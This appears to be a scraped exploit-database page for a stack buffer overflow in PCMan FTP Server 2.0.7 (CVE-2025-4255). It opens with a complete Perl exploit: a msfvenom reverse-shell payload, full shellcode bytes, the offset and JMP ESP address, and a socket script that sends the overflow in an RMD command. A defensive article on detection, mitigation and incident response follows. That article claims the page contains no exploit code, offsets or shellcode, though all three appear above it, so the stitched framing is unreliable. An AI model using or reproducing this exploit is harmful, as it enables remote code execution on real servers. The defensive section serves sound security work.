PCMan FTP Server 2.0.7 - Buffer Overflow

Exploit Author: Fernando Mengali Analysis Author: www.bubbleslearn.ir Category: Remote Language: Perl Published Date: 2025-06-15 
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255

# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)

my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
"\x17";


# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)

my $sock = IO::Socket::INET->new(
    PeerAddr => "192.168.176.131",
    PeerPort => "21",
    Proto    => 'tcp',
) or die "Cannot connect to 192.168.176.131:21: $!\n";

my $offset = "A"x2007;
my $eip = "\xd9\x2f\xe3\x74";
my $nops = "\x90"x20;
my $payload = $offset . $eip . $nops . $buf;
my $r = <$sock>;
print $sock "USER anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "PASS anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "RMD $payload\r\n";
$r = <$sock>;
print $r;
sleep(1);
close($sock);


PCMan FTP Server 2.0.7 — CVE-2025-4255: Overview and Defensive Guidance

This article explains the PCMan FTP Server 2.0.7 stack-based buffer overflow tracked as CVE-2025-4255, focusing on technical background, risk assessment, detection, and mitigation for defenders. It intentionally avoids step‑by‑step exploitation instructions and working exploit code, and instead provides practical, defensive, and incident‑response oriented guidance for system owners, defenders, and incident responders.

Summary

CVE-2025-4255 is a stack-based buffer overflow vulnerability in PCMan FTP Server 2.0.7 that can be triggered by an overlong FTP command argument (notably in commands that accept path strings). When successful, the vulnerability may allow arbitrary code execution under the privileges of the FTP service. Because many legacy FTP deployments run with elevated rights on older Windows hosts, exposure is high in unpatched environments.

Affected software and impact

  • Affected product: PCMan FTP Server 2.0.7
  • Typical impact: Remote code execution, service compromise, persistence, and lateral movement if exploited
  • Primary risk vectors: Internet-exposed or reachable FTP servers, default or weak network segmentation, legacy Windows systems without modern mitigations
  • Notable environment: Commonly observed on legacy Windows XP / Windows Server 2003 era systems in legacy environments — such hosts are high-risk because modern DEP/ASLR mitigations may be absent or ineffective

Technical analysis (high-level)

At a high level, the vulnerability is a classic stack-based buffer overflow in the FTP command handling routine that accepts path-like arguments. An attacker can send an overly long argument to a targeted FTP command, causing the process to overwrite stack frames and control flow data. With sufficient control, an attacker may redirect execution to attacker-supplied content (payload) and achieve arbitrary code execution.

Key defensive takeaways from the technical root cause:

  • The issue stems from inadequate bounds checking when copying client-supplied data into a fixed-size stack buffer.
  • Legacy systems (older compilers and OS builds) often lacked or had weaker exploit mitigations (e.g., no ASLR, weaker DEP/SEH protections), increasing exploitation reliability.
  • Network-level exposure of FTP (TCP/21) multiplies risk — publicly reachable FTP servers should be treated as high-value targets.

Exploitability and attacker considerations (non-actionable)

Exploitability depends on several environmental factors such as target OS version, compile-time protections, service account privileges, and presence of network controls. Attackers who successfully exploit this type of vulnerability often attempt to spawn remote shells, upload backdoors, or move laterally. Because this article is written for defenders, we do not provide exploit code, offsets, or shellcode recipes.

Indicators of Compromise (IoCs) and behavioral signs

Look for behavioral and environmental indicators rather than raw exploit bytes. Useful IoCs include:

  • Unusually long FTP command arguments in server logs — for example, commands that accept path arguments (RMD, CWD, MKD, RNFR, RNTO, etc.) with extremely long payloads.
  • Unexpected child processes spawned by the FTP server (especially command shells, netcat-like binaries, or unknown executables).
  • New or modified service autorun entries, scheduled tasks, or persistence markers created shortly after anomalous FTP activity.
  • Outbound connections to suspicious remote hosts from the FTP server host (reverse shells or beaconing behavior).
  • Elevated CPU or memory usage of the FTP service following unusual requests, or repeated crashes and restarts of the FTP daemon.

Detection and hunting: practical examples for defenders

Below are safe, defensive examples you can use to detect vulnerable servers and hunt for suspicious activity. These are intended for defenders only and avoid exploit details.

1) Banner/version discovery (safe)

import socket
# Defensive script: retrieve FTP banner to check server version
# Use only on assets you own or are authorized to test
host = "10.0.0.5"
port = 21
try:
    s = socket.create_connection((host, port), timeout=5)
    banner = s.recv(1024)
    print("Banner:", banner.decode(errors='ignore'))
    s.close()
except Exception as e:
    print("Error:", e)

Explanation: This short script connects to a target FTP server and reads the initial banner line that many FTP servers present on connect. Defenders can use this to identify exposed PCMan FTP Server instances. Perform such checks only on assets you are authorized to scan.

2) Log-based detection patterns

Instead of searching for exploit byte patterns, search your FTP logs for abnormal lengths or repeated malformed requests. Example pseudo-queries for common SIEMs:

  • Splunk (pseudo): index=ftp sourcetype=ftp_logs | where len(request) > 1500 and request_command IN ("RMD","MKD","CWD")
  • ELK/Kibana (pseudo): request_command:(RMD OR MKD OR CWD) AND message_length:>1500

Explanation: These queries look for commands with unusually long arguments — a common sign that someone attempted to overrun a buffer. Tune length thresholds to your environment; baseline normal request sizes first to reduce false positives.

3) Network monitoring and IDS strategy

Configure network IDS/IPS and WAF rules to alert or block when FTP commands include arguments that exceed expected lengths, or when the FTP server receives a burst of anomalous requests from a single external IP. Example defensive approaches:

  • Block or rate-limit FTP traffic from untrusted networks at the perimeter firewall.
  • Create IDS rules that trigger on FTP commands with argument lengths significantly greater than the norm (this is behavior-based and not signature-based).
  • Monitor for repeated connection attempts and unusual command sequences from single remote IPs.

Mitigation and remediation

Primary remediation is to remove the vulnerable software or apply the vendor patch. If immediate patching is not possible, apply layered mitigations to reduce risk.

  • Patch/update: Apply vendor-supplied updates or upgrade to a maintained FTP solution. If a vendor patch is available, apply it on all affected hosts as soon as possible.
  • Remove or replace: Consider replacing legacy FTP with secure alternatives (SFTP/FTPS) or modern managed file-transfer solutions that receive security updates.
  • Isolate and firewall: Block inbound TCP/21 at the perimeter unless business needs require it. Restrict FTP access via ACLs and VPNs to known trusted hosts.
  • Least privilege: Ensure the FTP service runs with least privilege and not as SYSTEM/Administrator where feasible.
  • Application-layer protections: Use WAF or application proxies to enforce maximum argument lengths for path commands and to normalize inputs.
  • Harden endpoints: Enable OS mitigations where available (DEP, ASLR, modern patch levels). Upgrade operating systems where possible.

Incident response and recovery

If you suspect exploitation, follow an established IR playbook and preserve evidence:

  • Isolate the host from the network to prevent further lateral movement; preserve volatile evidence (memory dumps, running process lists, network connections) before restarting or shutting down.
  • Collect FTP server logs, system event logs, scheduled tasks, autoruns, and registry changes. Capture network pcap covering the relevant timeframe.
  • Perform a full forensic analysis (memory + disk) to identify indicators of execution (shell processes, injected DLLs, unknown files, persistence mechanisms).
  • Reset credentials and review accounts for unauthorized additions.
  • Rebuild compromised hosts from known-good images when possible; do not trust a compromised system to be sanitized in place unless you have a validated remediation process.

Prioritization and risk management

Prioritize remediation based on exposure and business impact: Internet-facing FTP servers, servers in highly privileged network segments, and hosts with legacy OSes should be remediated first. Maintain an asset inventory and map business-critical data flows that rely on FTP.

References and resources

Item Resource
CVE entry CVE (search CVE-2025-4255)
Vendor / Project PCMan/OpenFoundry project page
Defensive reading Guides on secure FTP deployment, network segmentation, and incident response playbooks

Final notes and responsible disclosure

If you are a software vendor or system owner who believes you have discovered a new vulnerability, follow responsible disclosure best practices: privately notify the vendor with reproducible, non-exploitable test cases, allow reasonable time for patch development, and coordinate public disclosure. If you are a defender, prioritize patching and isolation over experimentation with exploitation techniques.